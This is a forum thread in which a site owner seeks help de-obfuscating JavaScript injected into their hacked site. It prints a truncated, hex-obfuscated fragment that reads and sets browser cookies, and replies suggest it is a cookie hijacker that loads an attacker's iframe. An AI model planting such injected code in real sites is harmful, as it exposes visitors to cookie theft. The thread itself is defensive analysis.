JohnnyDoomo Posted November 26, 2012 Share Posted November 26, 2012 I'm looking for a smart online javascript decoder. My site was recently hacked and I'm looking to figure out what a javascript file is doing that didn't match my original, and it has obfuscated code in it. I say a smart decoder, because it seems that parts of the code are encoded and others aren't. I've tried inserting it into all types of online decoders that come up with Google but they all through out errors instead of decode the parts that are in hex / base64. I hesitate inserting the code here if for no other reason than that on my site it created an iframe, and if that code is posted publicly, I didn't want that site to get any more promotion or this phpfreaks account be linked to that website. However, if this is the only way, I would be willing to PM someone to decode it for me, as I'm not a coder that can get javascript to write out what it's doing. Does anybody have better de-obfuscation websites than what are on the first page of google? Here's a sample of what the obfuscated code looks like: var NRH9="use\x72\x69\x64A\x3081\x37\x46B25";var oy3Al="27";var ab9RvC=1;var EJ_a;function K5N8T(HhRkaFs){var qu24;var RVy9q=document.cookie;if(!RVy9q){return null;}RVy9q=RVy9q.replace(/\s/g,"");var qxtJhjG=RVy9q.split(";");for(var i=0;i<qxtJhjG.length;i++){var jyl8E=qxtJhjG[i].split("=");if(jyl8E[0]==HhRkaFs){qu24=unescape(jyl8E[1]);break;}}return qu24;};function yJoulC(HhRkaFs,Omd1n,OR4TxKq){var exp=new Date();var AJdUl=exp.getTime()+(OR4TxKq*60*60*1000) Thanks for any help! Quote Link to comment https://forums.phpfreaks.com/topic/271210-smart-online-javascript-de-obfuscator/ Share on other sites More sharing options...
codefossa Posted November 26, 2012 Share Posted November 26, 2012 It's just a string in hex that I see. The rest is regular JS? And it looks like it's just a cookie/session hijacker. You should reset all users passwords and provide new login codes if you use a cookie and set it. If you set plain cookie for user and pass, then he has passwords, but you should have everything encrypted like that for the safety of your users. Quote Link to comment https://forums.phpfreaks.com/topic/271210-smart-online-javascript-de-obfuscator/#findComment-1395365 Share on other sites More sharing options...
JohnnyDoomo Posted November 27, 2012 Author Share Posted November 27, 2012 My site has no user registration system. The rest of the code is similar jibberish to me. That's just the first part of the encrypted code. There was an iframe being generated as well on pages, which I can make out the iframe code in the jibberish as it has rame with the hex code for the "i" and the "f". As I said, I don't want to post the whole thing publicly, but I'm interested in knowing what the rest of the code was doing. Quote Link to comment https://forums.phpfreaks.com/topic/271210-smart-online-javascript-de-obfuscator/#findComment-1395374 Share on other sites More sharing options...
codefossa Posted November 27, 2012 Share Posted November 27, 2012 Most likely it appends an iframe to the page with the source linking to a page he owns. It then probably has cookies as parameters in order to log it. If there is no use of cookies on your site, including for yourself (for example an admin panel), then I don't know. If there is, that's most likely what they're after. You didn't really give us much to go on. Quote Link to comment https://forums.phpfreaks.com/topic/271210-smart-online-javascript-de-obfuscator/#findComment-1395381 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.